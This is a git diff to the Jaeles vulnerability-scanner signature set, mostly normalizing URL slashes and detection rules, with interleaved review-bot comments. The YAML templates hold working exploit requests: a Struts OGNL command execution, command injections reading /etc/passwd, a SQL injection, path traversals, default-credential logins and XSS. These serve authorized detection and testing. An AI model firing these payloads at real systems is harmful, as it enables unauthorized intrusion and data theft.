diff --git a/README.md b/README.md
index aff73ae..1dbcfea 100644
--- a/README.md
+++ b/README.md
@@ -9,7 +9,6 @@
***
-
This repo only contain Default Signatures for Jaeles project. Pull requests or any ideas are welcome.
@@ -119,6 +118,18 @@ Fuzz signatures may have many false positive because I can't defined exactly wha
Become a financial contributor and help us sustain our community. [[Contribute](https://opencollective.com/jaeles-project/contribute)]
+## Special Thanks
+
+
+
+
+Explore the latest vulnerabilities at cvebase.com
+
+
+
+
+
+
## License
`Jaeles` is made with ♥ by [@j3ssiejjj](https://twitter.com/j3ssiejjj) and it is released under the MIT license.
diff --git a/cves/apache-ofbiz-xss-cve-2020-9496.yaml b/cves/apache-ofbiz-xss-cve-2020-9496.yaml
index 0802cc2..5a18718 100644
--- a/cves/apache-ofbiz-xss-cve-2020-9496.yaml
+++ b/cves/apache-ofbiz-xss-cve-2020-9496.yaml
@@ -4,13 +4,12 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
-
+ - root: '{{.BaseURL}}'
requests:
- method: POST
url: >-
- {{.root}}webtools/control/xmlrpc
+ {{.root}}/webtools/control/xmlrpc
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- Origin: http://{{.Host}}
diff --git a/cves/apache-struts-rce-cve-2013-2251.yaml b/cves/apache-struts-rce-cve-2013-2251.yaml
index 3999bfc..f6f0417 100644
--- a/cves/apache-struts-rce-cve-2013-2251.yaml
+++ b/cves/apache-struts-rce-cve-2013-2251.yaml
@@ -4,7 +4,7 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -13,19 +13,19 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
+ {{.root}}/{{.endpoint}}?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
- >-
- StatusCode() == 200 && StringSearch("resBody", "uid=")
+ StatusCode() == 200 && StringSearch("body", "uid=") && StringSearch("body", "gid=")
- method: GET
url: >-
- {{.root}}{{.endpoint}}?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
+ {{.root}}/{{.endpoint}}?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
- >-
- StatusCode() == 200 && StringSearch("resBody", "uid=")
+ StatusCode() == 200 && StringSearch("body", "uid=") && StringSearch("body", "gid=")
references:
- https://www.cvebase.com/cve/2013/2251
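Review bot: The new detections on L65 and L75 address the response body as `"body"`, while the rest of this commit uses `"resBody"` (L255, L750) and `'response'` (L287), and for headers both `"resHeaders"` (L98, L255) and `'resHeader'` (L137). If Jaeles treats all of these as aliases the mix is only a style issue, but if any spelling is not a recognized component that detection may simply never match, so please confirm each against the detection language and settle on one name per component across the signature set. The `endpoint` variable these URLs expand starts in the previous hunk, outside this one.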
diff --git a/cves/apache-struts-rce-cve-2017-5638.yaml b/cves/apache-struts-rce-cve-2017-5638.yaml
index b8f709b..14ce59f 100644
--- a/cves/apache-struts-rce-cve-2017-5638.yaml
+++ b/cves/apache-struts-rce-cve-2017-5638.yaml
@@ -4,7 +4,7 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
requests:
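Review bot: `variables:` on L87 is a bare key with no value, which YAML loads as null rather than an empty list; the same bare key appears in cves/exacqvision-web-service-rce-cve-2020-9047.yaml (L661) and cves/citrix-sharefile-path-traversal-cve-2020-8982.yaml (L567). The loader probably tolerates a nil slice, but the key carries no information and reads as an unfinished edit, so either drop the line or write `variables: []` explicitly.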
@@ -15,10 +15,10 @@ requests:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- Content-Type: "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Jaeles','cvebase')}.multipart/form-data"
- Pragma: no-cache
- - Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
-
+ - Accept: 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*'
detections:
- >-
StatusCode() == 200 && StringSearch("resHeaders", "X-Jaeles: cvebase")
+
references:
- https://www.cvebase.com/cve/2017/5638
diff --git a/cves/apache-tomcat-jkstatus-exposed-cve-2018-11759.yaml b/cves/apache-tomcat-jkstatus-exposed-cve-2018-11759.yaml
index 2f5f6d5..f67ecaf 100644
--- a/cves/apache-tomcat-jkstatus-exposed-cve-2018-11759.yaml
+++ b/cves/apache-tomcat-jkstatus-exposed-cve-2018-11759.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -13,7 +13,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}
+ {{.root}}/{{.endpoint}}
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/apache-tomcat-open-redirect-cve-2018-11784.yaml b/cves/apache-tomcat-open-redirect-cve-2018-11784.yaml
index e522016..762dd2a 100644
--- a/cves/apache-tomcat-open-redirect-cve-2018-11784.yaml
+++ b/cves/apache-tomcat-open-redirect-cve-2018-11784.yaml
@@ -7,12 +7,12 @@ requests:
- method: GET
redirect: false
url: >-
- {{.BaseURL}}//google.com
+ {{.BaseURL}}//bing.com
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
- >-
- StatusCode() == 302 && StringSearch('resHeader', 'google.com') && !RegexSearch('resHeader', 'Location.*{{.Domain}}.*')
+ StatusCode() == 302 && StringSearch('resHeader', 'bing.com') && !RegexSearch('resHeader', 'Location.*{{.Domain}}.*')
reference:
- https://www.cvebase.com/cve/2018/11784
\ No newline at end of file
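Review bot: The references block on L138 is keyed `reference:` while the other signatures in this commit use `references:` (L76, L256, L289, L491), and cves/cisco-asa-path-traversal-cve-2020-3452.yaml (L382) uses `reference:` with a nested `- links:` list; a consumer that reads one key will miss the other, so pick one spelling and one shape. On L137 the component is spelled `'resHeader'` whereas L98 and L255 use `"resHeaders"`; confirm both are recognized or normalize to one. The file also ends without a trailing newline (L140).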
diff --git a/cves/apache-tomcat-put-cve-2017-12615.yaml b/cves/apache-tomcat-put-cve-2017-12615.yaml
index ae0275a..ac268a6 100644
--- a/cves/apache-tomcat-put-cve-2017-12615.yaml
+++ b/cves/apache-tomcat-put-cve-2017-12615.yaml
@@ -1,4 +1,5 @@
id: CVE-2017-12615
+single: true
info:
name: Tomcat PUT method allowed
risk: High
@@ -6,7 +7,6 @@ info:
variables:
- ran: RandomString(6)
-
requests:
- method: PUT
redirect: false
diff --git a/cves/apache-tomcat-rce-cve-2020-9484.yaml b/cves/apache-tomcat-rce-cve-2020-9484.yaml
index 17308e8..ab9f188 100644
--- a/cves/apache-tomcat-rce-cve-2020-9484.yaml
+++ b/cves/apache-tomcat-rce-cve-2020-9484.yaml
@@ -4,12 +4,12 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
requests:
- method: GET
url: >-
- {{.root}}cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd
+ {{.root}}/cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy
diff --git a/cves/artica-web-proxy-sqli-cve-2020-17506.yaml b/cves/artica-web-proxy-sqli-cve-2020-17506.yaml
index 1658a6c..e678464 100644
--- a/cves/artica-web-proxy-sqli-cve-2020-17506.yaml
+++ b/cves/artica-web-proxy-sqli-cve-2020-17506.yaml
@@ -4,12 +4,12 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
requests:
- method: GET
url: >-
- {{.root}}fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;
+ {{.root}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/artifactory-improper-authorization-cve-2019-9733.yaml b/cves/artifactory-improper-authorization-cve-2019-9733.yaml
index c6cdd96..0e99166 100644
--- a/cves/artifactory-improper-authorization-cve-2019-9733.yaml
+++ b/cves/artifactory-improper-authorization-cve-2019-9733.yaml
@@ -4,7 +4,7 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?_spring_security_remember_me=false
+ {{.root}}/{{.endpoint}}?_spring_security_remember_me=false
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- X-Requested-With: artUI
@@ -20,12 +20,13 @@ requests:
- X-Forwarded-For: 127.0.0.1
- Request-Agent: artifactoryUI
- Content-Type: application/json
- - Origin: http://{{Hostname}}
- - Referer: http://{{Hostname}}/artifactory/webapp/
+ - Origin: http://{{.Host}}
+ - Referer: http://{{.Host}}/artifactory/webapp/
- Accept-Encoding: gzip, deflate
- Accept-Language: en-US,en;q=0.9
- Connection: close
- body: {"user":"access-admin","password":"password","type":"login"}
+ body: |
+ {"user":"access-admin","password":"password","type":"login"}
detections:
- >-
StatusCode() == 200 && RegexSearch("resBody", '"username": "access-admin"')
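Review bot: `body: |` on L224 keeps a trailing newline, so the JSON on L225 is sent as `{...}\n`; the same chomping applies to L250 and L799. Most JSON parsers ignore the trailing whitespace, but if a byte-exact body is wanted `body: |-` strips it and keeps the request length equal to the literal payload. This is only about the chomping indicator; the move to a block scalar itself is what the unquoted flow mapping needed.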
diff --git a/cves/atlassian-confluence-path-traversal-cve-2019-3396.yaml b/cves/atlassian-confluence-path-traversal-cve-2019-3396.yaml
index 705d46d..daeaf65 100644
--- a/cves/atlassian-confluence-path-traversal-cve-2019-3396.yaml
+++ b/cves/atlassian-confluence-path-traversal-cve-2019-3396.yaml
@@ -4,21 +4,23 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
rest/tinymce/1/macro/preview
+
requests:
- method: POST
url: >-
- {{.root}}{{.endpoint}}
+ {{.root}}/{{.endpoint}}
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- body: {"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
+ body: |
+ {"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
detections:
- >-
- StatusCode() == 200 && StringSearch("resBody", "contextConfigLocation ")
+ StatusCode() == 200 && StringSearch("resBody", "contextConfigLocation ") && StringSearch("resHeaders", "application/xml")
references:
- https://www.cvebase.com/cve/2019/3396
diff --git a/cves/atlassian-confluence-xss-cve-2018-5230.yaml b/cves/atlassian-confluence-xss-cve-2018-5230.yaml
index e7d7343..64f4707 100644
--- a/cves/atlassian-confluence-xss-cve-2018-5230.yaml
+++ b/cves/atlassian-confluence-xss-cve-2018-5230.yaml
@@ -4,19 +4,22 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: "{{.BaseURL}}"
-variables:
- - endpoint: |
- pages/includes/
-requests:
+replicate:
+ ports: '8080'
+ prefixes: 'jira, wiki, confluence'
+
+requests:
- method: GET
+ redirect: false
url: >-
- {{.root}}{{.endpoint}}status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%281337%29%22%3E.vm
+ {{.root}}/pages/includes/status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%281337%29%22%3E.vm
headers:
- - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
detections:
- >-
- StatusCode() == 200 && StringSearch("resBody", 'SRC="javascript:alert(1337)">')
+ StatusCode() == 200 && StringSearch('response', 'javascript:alert(1337)') && StringSearch('response', 'LowestInnerExceptionMessage')
+
references:
- https://www.cvebase.com/cve/2018/5230
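Review bot: `root: "{{.BaseURL}}"` on L266 is the only double-quoted root in the commit; every other signature writes `'{{.BaseURL}}'`, and single quotes are the better fit since nothing in the value needs escape processing. The new `replicate.prefixes` value on L273 is `'jira, wiki, confluence'` with spaces after the commas; unless the loader trims each entry, the second and third prefixes become ` wiki` and ` confluence`, so either drop the spaces or confirm trimming. The detection on L287 now requires `LowestInnerExceptionMessage` alongside the reflected payload; a one-line comment above it explaining why that marker is expected in a positive response would help the next maintainer.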
diff --git a/cves/atlassian-rce-cve-2019-11580.yaml b/cves/atlassian-rce-cve-2019-11580.yaml
index f9be9f7..c74bc8b 100644
--- a/cves/atlassian-rce-cve-2019-11580.yaml
+++ b/cves/atlassian-rce-cve-2019-11580.yaml
@@ -4,7 +4,7 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?cmd=cat%20/etc/passwd
+ {{.root}}/{{.endpoint}}?cmd=cat%20/etc/passwd
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/cisco-asa-path-traversal-cve-2018-0296.yaml b/cves/cisco-asa-path-traversal-cve-2018-0296.yaml
index 502fd94..d056e7f 100644
--- a/cves/cisco-asa-path-traversal-cve-2018-0296.yaml
+++ b/cves/cisco-asa-path-traversal-cve-2018-0296.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}../+CSCOE+/files/file_list.json?path=/sessions
+ {{.root}}/{{.endpoint}}../+CSCOE+/files/file_list.json?path=/sessions
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/cisco-asa-path-traversal-cve-2020-3187.yaml b/cves/cisco-asa-path-traversal-cve-2020-3187.yaml
index 406a1c0..d320023 100644
--- a/cves/cisco-asa-path-traversal-cve-2020-3187.yaml
+++ b/cves/cisco-asa-path-traversal-cve-2020-3187.yaml
@@ -4,7 +4,7 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -13,7 +13,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}
+ {{.root}}/{{.endpoint}}
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/cisco-asa-path-traversal-cve-2020-3452.yaml b/cves/cisco-asa-path-traversal-cve-2020-3452.yaml
index 1262c13..c7a013d 100644
--- a/cves/cisco-asa-path-traversal-cve-2020-3452.yaml
+++ b/cves/cisco-asa-path-traversal-cve-2020-3452.yaml
@@ -1,5 +1,4 @@
id: CVE-2020-3452
-donce: true
info:
name: Cisco ASA - Unauthenticated LFI and Delete File (CVE-2020-3452)
risk: High
@@ -12,7 +11,7 @@ requests:
- method: GET
redirect: false
url: >-
- {{.root}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
+ {{.root}}//+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
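Review bot: L366 changes the request path to `{{.root}}//+CSCOT+/…` with a double slash, and the same pattern appears on L375, in cves/citrix-adc-lfi-cve-2020-8193.yaml (L434, L443), cves/citrix-path-traversal-cve-2020-7473.yaml (L523), cves/f5-bigip-rce-cve-2020-5902.yaml (L693) and cves/fortinet-fortigate-vpn-path-traversal-xss-cve-2018-13379.yaml (L706, L715, L724). In the F5 file the `root` param is visibly `'{{.BaseURL}}'` (L678) and the first request uses a single slash (L684) while the second uses two (L693), and the XmlPeek request is written with `//` on L523 but `/` on L572 of the ShareFile signature, so the extra slash does not look like a consistent convention. If it is deliberate, a comment on the url such as `# double slash intentional` with the reason keeps the next normalization pass from removing it; otherwise these should follow the `{{.root}}/path` form the rest of the commit adopts. The `params` block for this file is outside the hunk, so I cannot tell whether root here still carries a trailing slash.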
@@ -23,14 +22,13 @@ requests:
- method: GET
redirect: false
url: >-
- {{.root}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/session_password.html&default-language&lang=../
+ {{.root}}//+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/session_password.html&default-language&lang=../
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
- >-
StatusCode() == 200 && StringSearch("body", "GET_OUT_RESOURCE") && StringSearch("resHeaders", "application/octet-stream")
-
reference:
- links:
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86
diff --git a/cves/cisco-dos-cve-2020-16139.yaml b/cves/cisco-dos-cve-2020-16139.yaml
index 5e28628..22b296c 100644
--- a/cves/cisco-dos-cve-2020-16139.yaml
+++ b/cves/cisco-dos-cve-2020-16139.yaml
@@ -4,7 +4,7 @@ info:
risk: Low
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: POST
url: >-
- {{.root}}{{.endpoint}}?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+ {{.root}}/{{.endpoint}}?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/cisco-rv-320-326-config-leak-cve-2019-1653.yaml b/cves/cisco-rv-320-326-config-leak-cve-2019-1653.yaml
index bffdf95..9de8baa 100644
--- a/cves/cisco-rv-320-326-config-leak-cve-2019-1653.yaml
+++ b/cves/cisco-rv-320-326-config-leak-cve-2019-1653.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}
+ {{.root}}/{{.endpoint}}
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/citrix-adc-lfi-cve-2020-8193.yaml b/cves/citrix-adc-lfi-cve-2020-8193.yaml
index 33b3447..af26b05 100644
--- a/cves/citrix-adc-lfi-cve-2020-8193.yaml
+++ b/cves/citrix-adc-lfi-cve-2020-8193.yaml
@@ -15,7 +15,7 @@ requests:
- method: POST
redirect: false
url: >-
- {{.root}}/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1
+ {{.root}}//pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
- Accept: application/xml
@@ -37,7 +37,7 @@ requests:
method: POST
redirect: false
url: >-
- {{.root}}/rapi/filedownload?filter=path:{{.file}}
+ {{.root}}//rapi/filedownload?filter=path:{{.file}}
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
- Accept: application/xml
diff --git a/cves/citrix-adc-path-traversal-cve-2019-19781.yaml b/cves/citrix-adc-path-traversal-cve-2019-19781.yaml
index 4599d61..1266bb7 100644
--- a/cves/citrix-adc-path-traversal-cve-2019-19781.yaml
+++ b/cves/citrix-adc-path-traversal-cve-2019-19781.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}../vpns/cfg/smb.conf
+ {{.root}}/{{.endpoint}}../vpns/cfg/smb.conf
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
@@ -21,7 +21,7 @@ requests:
- method: POST
redirect: false
url: >-
- {{.BaseURL}}{{.endpoint}}../vpns/portal/scripts/newbm.pl
+ {{.root}}/{{.endpoint}}../vpns/portal/scripts/newbm.pl
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- NSC_USER: ../../../netscaler/portal/templates/somuniquestr
@@ -36,13 +36,14 @@ requests:
- method: GET
redirect: false
url: >-
- {{.BaseURL}}{{.endpoint}}../vpns/portal/somuniquestr.xml
+ {{.root}}/{{.endpoint}}../vpns/portal/somuniquestr.xml
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- NSC_USER: nsroot
- NSC_NONCE: nsroot
detections:
- >-
- StatusCode() == 200 && StringSearch("response", "root:")
+ StatusCode() == 200 && StringSearch("response", "root:") && StringSearch("response", "bin/bash")
+
references:
- https://www.cvebase.com/cve/2019/19781
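Review bot: The detection on L489 now also requires `bin/bash` in the response, which differs from the `RegexSearch("resBody", "root:[x*]:0:0:")` form this same commit uses for the same kind of response (L644, L750). A passwd file whose root entry names a different shell would fail the added term, so the regex form is both more specific about what it matches and more consistent with the other signatures. The request being checked starts in this hunk and its headers are visible, so the change is otherwise self-contained.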
diff --git a/cves/citrix-code-injection-cve-2020-8194.yaml b/cves/citrix-code-injection-cve-2020-8194.yaml
index 07fa93b..2f8cbc9 100644
--- a/cves/citrix-code-injection-cve-2020-8194.yaml
+++ b/cves/citrix-code-injection-cve-2020-8194.yaml
@@ -1,15 +1,15 @@
id: CVE-2020-8194
info:
name: Citrix CDC & Gateway Code Injection
- risk: High
+ risk: Medium
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
requests:
- method: GET
url: >-
- {{.root}}menu/guiw?nsbrand=1&protocol=nonexistent.1337">&id=3&nsvpx=phpinfo
+ {{.root}}/menu/guiw?nsbrand=1&protocol=nonexistent.1337">&id=3&nsvpx=phpinfo
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- Content-Type: application/x-www-form-urlencoded
diff --git a/cves/citrix-path-traversal-cve-2020-7473.yaml b/cves/citrix-path-traversal-cve-2020-7473.yaml
index 74aa786..5384f98 100644
--- a/cves/citrix-path-traversal-cve-2020-7473.yaml
+++ b/cves/citrix-path-traversal-cve-2020-7473.yaml
@@ -11,20 +11,12 @@ requests:
- method: GET
redirect: false
url: >-
- {{.root}}/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri
+ {{.root}}//XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
- >-
StatusCode() == 200 && StringSearch('body', 'bit app support') && StringSearch('body', 'extensions')
- - method: GET
- redirect: false
- url: >-
- {{.root}}/UploadTest.aspx
- headers:
- - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
- detections:
- - >-
- StatusCode() == 200 && ContentLength('body') == 0 && StringSearch('resHeader', 'Access-Control-Allow-Origin: *')
+
references:
- https://www.cvebase.com/cve/2020/7473
diff --git a/cves/citrix-reflected-xss-cve-2020-8191.yaml b/cves/citrix-reflected-xss-cve-2020-8191.yaml
index fb47ed1..1aa2492 100644
--- a/cves/citrix-reflected-xss-cve-2020-8191.yaml
+++ b/cves/citrix-reflected-xss-cve-2020-8191.yaml
@@ -4,12 +4,12 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
requests:
- method: POST
url: >-
- {{.root}}menu/stapp
+ {{.root}}/menu/stapp
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- Content-Type: application/x-www-form-urlencoded
diff --git a/cves/citrix-sharefile-path-traversal-cve-2020-8982.yaml b/cves/citrix-sharefile-path-traversal-cve-2020-8982.yaml
index d770689..0455838 100644
--- a/cves/citrix-sharefile-path-traversal-cve-2020-8982.yaml
+++ b/cves/citrix-sharefile-path-traversal-cve-2020-8982.yaml
@@ -4,13 +4,13 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
requests:
- method: GET
url: >-
- {{.root}}XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri
+ {{.root}}/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
